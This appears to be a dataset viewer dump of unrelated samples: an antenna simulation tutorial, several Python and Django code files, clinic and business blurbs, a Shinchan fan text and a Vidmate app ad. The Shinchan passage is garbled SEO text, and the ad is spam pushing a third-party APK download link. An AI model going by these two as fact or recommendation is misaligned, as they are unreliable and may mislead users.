After solving the structure for an operating frequency of 2.9 GHz, you can study the far-field radiation patterns generated by the DRA. You can visualize these patterns on the E-plane and H-plane (left plot below) as well as in 3D (right plot below). The results from the simulations indicate that the resonator and metallic strips help increase the directivity of the antenna.
Left: Far-field radiation pattern on the E-plane (blue) and H-plane (green) at 2.9 GHz. Right: 3D far-field radiation pattern.
As this example demonstrates, you can evaluate the dielectric resonator’s effect at different frequencies for an antenna as well as optimize a DRA design to improve the directivity and gain.
To get started with modeling DRAs, click the button below. Doing so will take you to the Application Gallery, where you can log into your COMSOL Access account and download the MPH-file and step-by-step instructions for the example.
|
import sublime, sublime_plugin
import subprocess
class JsToCoffeescriptCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
# get non-empty selections
regions = [s for s in view.sel() if not s.empty()]
# if there's no non-empty selection, filter the whole document
if len(regions) == 0:
regions = [ sublime.Region(0, view.size()) ]
for region in reversed(regions):
content = view.substr(region)
new_content = self.js2coffee(content)
view.replace(edit, region, new_content)
def js2coffee(self, contents):
indentation = 2
command = "js2coffee -i%d" % (indentation)
js2coffee = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
output, error = js2coffee.communicate(bytearray(contents, "utf-8"));
if error:
# self.write_to_console(error)
# self.window.run_command("show_panel", {"panel": "output.exec"})
print("JsToCoffeescript: ERROR!")
print("Result: %s" % error)
return None
return output.decode("utf-8")
|
Congratulations to Marcia Mavrides on being named a Top Rated Lawyer 2018 by the National Law Journal!
issues and legal news for the business and private sectors.
Attorney Mavrides owes her success to her ability to work closely with each client, helping them toward a comprehensive and clear understanding of the legal process and its impact on their lives.
See the press release in the Boston Herald, here!
|
import numpy as np
from numpy.random import RandomState
from fgn import fbm
import scipy.io as io
N, H = 2**20 + 1, 0.5
generator = fbm( N = N, H = H, time = True )
generator.set_rnd( RandomState( 123 ) )
T, X = generator( )
io.savemat( './output/data.mat', { 'T': T, 'X': X, 'H': H, 'N': N } )
# import numpy as np
# import scipy.io as io
# mat = io.loadmat( './output/data.mat' )
# H, X, T, N = mat['H'][0], mat['X'][0], mat['T'][0], mat['N'][0]
from crossing_tree import xtree_build, f_get_w
delta = 1e-3 # np.std( np.diff( X ) )
Tnk, Xnk, Znk, Vnk, Wnk = xtree_build( T, X, delta = delta )
print np.unique( Znk[1], return_counts = True )
## %% clear all ; format long ;
## %%
## %% cd c:\study_notes\year_14_15\course_project\code
## %%
## %% load('C:\study_notes\year_14_15\course_project\code\project\output\data.mat')
## %%
## %% Zr = 2 : 2 : 40 ;
## %% delta = 1e-3 ; % std( diff( X ) ) ;
## %% [ w, subx, hp, ht ] = f_get_w( X, T, [ 0 : 16 ], delta, 0 ) ;
## %% Z = [ subx{ 1+1 } ] ;
## %% for z = Zr
## %% sum( Z == z ) %/ length( Z )
## %% end
if False :
## # ht, hp, hx, hv = f_get_w( T, X, range( 0, 17 ), delta )
## # print np.all( [ np.allclose( a0,a1 ) for a0, a1 in zip( Xnk, hp ) ] )
io.savemat( './output/xtree.mat', { 'Xnk': Xnk, 'Tnk': Tnk } )
##
Z = ( X - X[ 0 ] ) / delta
Z_floor = np.floor( Z, np.empty_like( Z, np.float64 ) )
Z_ceil = np.ceil( Z, np.empty_like( Z, np.float64 ) )
io.savemat( './output/ceil_floor.mat', {
'py_ceilz': Z_ceil,
'py_floorz': Z_floor,
} )
################################################################################
delta = np.std( np.diff( X ) )
Tnk, Xnk, Znk, Vnk, Wnk = xtree_build( T, X, delta = delta )
Nn = np.zeros( ( 1 + max_levels + 1, 1 ), dtype = np.int )
for n, Xk in enumerate( Xnk, 0 ) :
n = max_levels + 1 if n > max_levels + 1 else n
Nn[ n ] += len( Xk ) - 1
Dnk = np.zeros( ( max_levels + 1, max_crossings // 2 ), dtype = np.int )
for n, Zk in enumerate( Znk[ 1: ], 0 ) :
n = max_levels if n > max_levels else n
Z_count, Z_freq = np.unique( Zk, return_counts = True )
Z_count = np.minimum( Z_count, max_crossings )
mask = ( Z_count < max_crossings )
Dnk[ n, Z_count[ mask ] // 2 - 1 ] += Z_freq[ mask ]
Dnk[ n, max_crossings // 2 - 1 ] += np.sum( Z_freq[ ~mask ] )
Vnde = np.zeros( ( max_levels + 1, 2, 2 ), dtype = np.int )
for n, Vk in enumerate( Vnk[ 1: ], 0 ) :
n = max_levels if n > max_levels else n
Vnde[ n, 0 ] += np.sum( Vk[ Vk[ :, 2 ] < 0 ], axis = 0 )[:2]
Vnde[ n, 1 ] += np.sum( Vk[ Vk[ :, 2 ] > 0 ], axis = 0 )[:2]
prc = np.array( [ 0.5, 1.0, 2.5, 5.0, 10, 25, 50, 75, 90, 95, 97.5, 99, 99.5 ] )
Wnp = np.zeros( ( max_levels, ) + prc.shape, dtype = np.float )
Wbarn = np.zeros( ( max_levels, 1 ), dtype = np.float )
Wstdn = np.zeros( ( max_levels, 1 ), dtype = np.float )
for n, Wk in enumerate( Wnk[1:], 0 ) :
if len( Wk ) and n < max_levels :
Wbarn[ n ], Wstdn[ n ], Wnp[ n ] = np.average( Wk ), np.std( Wk ), np.percentile( Wk, prc )
|
Denver Health has been recognized as a leader in LGBT health care by the Human Rights Campaign Foundation for five consecutive years, and with its national recognition and commitment to LGBT health care, Denver Health is proud of being an “LGBT Center of Excellence.” Denver Health is open, affirming and provides excellent care for ALL people. At Denver Health, the LGBT friendly doctors and staff are dedicated to providing high quality and welcoming healthcare for all, which means a team of medical providers, including physicians and nurses, is there to care for LGBT patients through family and internal medicine, mental health and pediatric services.
Denver Health’s LGBT Center of Excellence offers open and affirming health care to transgender and gender non-conforming populations. They have trained medical doctors at nine family health centers and main campus who provide the medical assistance, including patient navigation, assistance in updating gender identification on your credentials, behavioral health and general primary care. We also offer gender reassignment surgery (confirmation surgery) options.
Our patient navigators are dedicated to ensuring that our lesbian, gay, bisexual and transgender patients are supported through their health care journey. All LGBT patients will be connected with welcoming and affirming medical providers for all of their health care needs. If you would like additional support, patient navigators are available to attend medical appointments with you and will continue to be your advocates as you become familiar with our healthcare system.
(303) 602-6760 or (303) 602-6819. / [email protected].
She does not require a letter for hormone therapy.
A transgender friendly practice with quite a few TG patients. You have the ability to see any one of the doctors, however Dr. Kristin Moreau was recommended to us. Offers hormone treatment and requires a letter from a therapist.
(303) 293-2220Stout Street Health Center is a place to go for transgender indigent healthcare. They provide hormones, testing, and follow WPATH’s guidelines. They also have other services such as counseling, psych care and eye care. They offer hormone treatment and does not require letters. They are a clinic specific to homeless people, so please check with them to see if you qualify for services.
|
#!/usr/bin/env python
import ctk_cli
from rstcloth import rstcloth
import argparse
def cli2rst(cliFile, rstFile):
cli = ctk_cli.CLIModule(cliFile)
rst = rstcloth.RstCloth()
rst.title(cli.title)
rst.newline()
rst.content(cli.description)
rst.newline()
rst.field('Authors', cli.contributor)
rst.field('Version', cli.version)
rst.field('License', cli.license)
rst.newline()
rst.newline()
for parameterGroup in cli:
rst.h2(parameterGroup.label + ' Parameters')
rst.content(parameterGroup.description)
rst.newline()
for parameter in parameterGroup:
rst.definition(parameter.label, parameter.description, bold=True)
rst.newline()
rst.write(rstFile)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert a CTK CLI XML description file to a reStructuredText documentation file.')
parser.add_argument('cliFile')
parser.add_argument('rstFile')
args = parser.parse_args()
cli2rst(args.cliFile, args.rstFile)
|
The background of Sammy’s project is listed above under The Epic Project.
Can you help, or do you know of someone in one of these countries? Please contact me either in comments or via email at [email protected] and I can pass along address, as well as make notes as to what country is being pledged.
And even though he wanted to start here, we’ll still be looking for other countries’ currency.
As we receive word from folks, I’ll strike though the countries on the list (as well as provide some sort of link to the person who responded). I’ll also get a Google Docs document up within the week to track.
|
"""
Define the implementation for Library interface and their class exceptions.
@created_at 2015-05-16
@author Exequiel Fuentes Lettura <[email protected]>
"""
import operator
from book import Book
class LibraryException(Exception):
"""Define an exception class for Library errors"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class OutOfBooksException(LibraryException):
"""Define an exception class for OutOfBooks errors"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class IllegalRatingException(LibraryException):
"""Define an exception class for IllegalRating errors"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
# Steps:
# 1. Define a list of books for creating our library
# 2. Implement methods
# 3. Indicate time and space complexity
# 4. Document any unusual edge cases or problems
class Library:
"""Define a class for the library implementation"""
MIN_RATING = 1
MAX_RATING = 100
def __init__(self):
self.books = {}
def add_book(self, book):
"""Add a new book to the library. We dont have a db, so we create a
dictonary with books
"""
if not book:
raise LibraryException("Book is null or empty, please add a book")
id = self.library_length() + 1
# id: primary key of the book
# store a tuple: book, available
self.books[str(id)] = book
def library_length(self):
"""Return length of the library"""
return len(self.books)
def print_library(self):
"""Just for checking object in books"""
for id, book in self.books.items():
print "--"
print "book id: %s" % id
print "book title: %s" % book.get_title()
print "book rating: %s" % book.get_rating()
print "book available: %s" % book.get_available()
print "book get_checkin_timestamp: %s" % book.get_checkin_timestamp()
# So the best case scenario: O(n), average and worst case O(nlogn)
def checkout_book(self, genre):
"""Returns the book most recently checked in in this genre, and removes
it from the pool of available items.
:param genre: the genre to which the book belongs
:return: the Book object that has just been checked out
:raises OutOfBooksException: if there are no books in that genre available
"""
if not genre:
raise LibraryException("Missed genre parameter")
# It has to go for all books in the list, so it's O(n)
genre_list = []
for id, book in self.books.items():
if book.get_genre() == genre and book.get_available():
genre_list.append(book)
# Check if there is books avaible for sorting
if not genre_list:
raise OutOfBooksException("There is no books in that genre available")
# Sorting by the highest rated book.
# Best case scenario: O(n), average and worst case O(nlogn)
recent_book = sorted(genre_list, key=operator.attrgetter('checkin_timestamp'), reverse=True)[0]
recent_book.set_available(False)
return recent_book
# So the average and worst case O(n)
def checkin_book(self, returned_book, rating):
"""Returns the book to the library's availability pool, making it the
last checked-in book and rating the book in the process.
:param returned_book: the Book that is being checked back in
:param rating: an integer from 1 to 100 (inclusive) specifying the
rating. The last person to rate the book overwrites any
previous rating
:raises IllegalRatingException: if a rating less than 1 or more than 100
is specified
"""
if not returned_book:
raise LibraryException("Book is null or empty, please add a book")
if rating < self.MIN_RATING:
raise IllegalRatingException("Rating less than " + self.MIN_RATING)
if rating > self.MAX_RATING:
raise IllegalRatingException("Rating greater than " + self.MAX_RATING)
# I'm guessing that the title is unique, then I'm checking if the book is
# on the dict.
# This implementation take O(n), where n is the number of books into the
# library.
# If the library is a db it should take less time guessing we have a
# code for locate the book in table
for id, book in self.books.items():
if book.get_title() == returned_book.get_title():
book.set_rating(rating)
book.set_available(True)
book.set_checkin_timestamp()
break
# What happens if the returned book is not into the list?
# So the best case scenario: O(n), average and worst case O(nlogn)
def peek_highest_rated_book(self, genre):
"""Returns the highest rated book in the specified genre, but does not
remove it from availability.
param genre: the genre for which we'd like to retrieve the highest-rated
book
:return: a Book that is the highest-rated book currently available in
the genre
:raises OutOfBooksException: if there are no books in that genre available
"""
if not genre:
raise LibraryException("Missed genre parameter")
# It has to go for all books in the list, so it's O(n)
genre_list = []
for id, book in self.books.items():
if book.get_genre() == genre and book.get_available():
genre_list.append(book)
# Check if there is books avaible for sorting
if not genre_list:
raise OutOfBooksException("There is no books in that genre available")
# Sorting by the highest rated book.
# Best case scenario: O(n), average and worst case O(nlogn)
return sorted(genre_list, key=operator.attrgetter('rating'), reverse=True)[0]
|
in the box below. He did reappear as "The Legendary imagin" in the. Mitsir, harry, heroshi, i created this video with the Video Editor ( m/editor loading. Shinchan - the buri buri zaemon with shinchan, kung bore musik the all time best series shinchan episode. Shin-MEN episodes as a palette-swapped cameo group of 5 evil clones called. Parallel Universe where, action Kamen is a real person who travels between the worlds to either act in the show or save the world. If you are new to wikis, check out the tutorial. On May 13, 2016 he returned permanently with a new voice actor, Hiroshi Kamiya, from episode 894b "The Adventures of Buriburizaemon: The Revival Chapter" ( ).
Prince Suchan and these two are the key to the treasure. Watch shin Chan full goblin episode. Hindi featuring, buri, buri, zaemon, loading. Brave Pig in the LUK Internacional dub, is a cowardly talking pig who is featured in some of the episodes and chapters set in ancient Japan. Buriburizaemon making a cameo apperance in the "Small Chocobi World" episode. That Shinchan found, shiro in a box? Shinchan likes watching a TV Show called. That Shinchan was orignally a Adult only Show? This was proven in the Second Movie, Shinchan in Action Kamen vs Hayegure Rakshas, Revealing that there. In 1994 he got the first in a series of his own special episodes called "The Adventures of Buriburizaemon which feature him not-quite-rescuing damsels in distress in samurai movie scenarios.
The result was that all adult jokes and scenes were either dubbed into other dialogues, removed or zoomed. Welcome to The, shinchan, wiki, the mission of Shinchan Wiki is to record and categorize everything about Shinchan, including characters and episodes from the Shinchan cartoons, mangas and movies. That Action Kamen is a real Hero? The Shinchan Base, shinchan is one of the main shows along with doraemon and kiteretsu. Buriburizaemon is a product. In the winters of, Shinchan was banned from television by parents due to adult jokes and kids getting bad manners.
|
""" Main file. All 4 features are running here. """
import sys
from collections import Counter
from datetime import timedelta
import active_users
import busiest_hours
import failed_login
import popular_resources
from io_utils import date_formatting, read_from_file, write_information_to_file
# File paths
filename = sys.argv[1]
hosts_filename = sys.argv[2]
hours_filename = sys.argv[3]
resources_filename = sys.argv[4]
blocked_filename = sys.argv[5]
# FEATURES 1 and 2
ip_frequency = Counter()
resources = Counter()
for entry in read_from_file(filename):
active_users.count_host_frequency(ip_frequency, entry)
popular_resources.count_bandwidth_resources(resources, entry)
top_hosts = ip_frequency.most_common(10)
# Write results to a file
for host in top_hosts:
information = host[0] + "," + str(host[1])
write_information_to_file(hosts_filename, information)
top_resources = resources.most_common(10)
# Write results to a file
for resource in top_resources:
write_information_to_file(resources_filename, resource[0])
# FEATURE 3
load_meter = busiest_hours.LoadMeter(filename, hours_filename)
load_meter.find_busiest_hours()
# FEATURE 4
access_blocker = failed_login.AccessBlocker(blocked_filename)
for entry in read_from_file(filename):
access_blocker.check_request(entry)
|
This gallery presents a sampling of my architectural images made for a variety of corporate and small business clients (or sometimes just for my own enjoyment). I am a preferred photographer for AvalonBay Communities, one of the largest apartment companies in the U.S. with nearly 300 apartment communities in 14 states and also for Choice Hotels International.
Please contact me at [email protected] if you are in need of residential or commercial real estate photography.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.db import models
from ..member.models import *
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
class Association(models.Model):
name = models.CharField(max_length=100)
description = models.TextField()
year_of_creation = models.DateField(auto_now=False, auto_now_add=False, null=True)
address = models.CharField(max_length=100)
phone = models.IntegerField(null=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
# email = models.EmailField(max_length=254, default="")
initials = models.CharField(max_length=25, default="")
logo = models.ImageField(upload_to='Images/Association/logo', blank=True)
country = models.ForeignKey('member.Country', null=True)
identifier = models.OneToOneField(User, null=True, on_delete=models.CASCADE)
email_confirmed = models.BooleanField(default=False)
def __str__(self):
return self.name
# @receiver(post_save, sender=User)
# def create_association(sender, instance, created, **kwargs):
# if created:
# Association.objects.get_or_create(identifier=instance)
#
# @receiver(post_save, sender=User)
# def save_association(sender, instance, **kwargs):
# instance.association.save()
|
Today almost every Internet user uses YT or any other video hosting to upload and watch video about cats, free movies and other content. But sometimes you want to download a videofile and the service doesn't allow you to do it. It's where Vidmate App is coming to help you out. It provides with an ability for you to download a movie from may services, including Youtube, Vimeo, Facebook and many other hosting services. To perform this you just need to find a video and click download button. Plus, the application is free of charge and very easy in use with your Android smartphone! Download Vidmate APK from https://vidmateapp.pro/apk/ now and start downloading your favourite movies to share them with your friends or family!
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.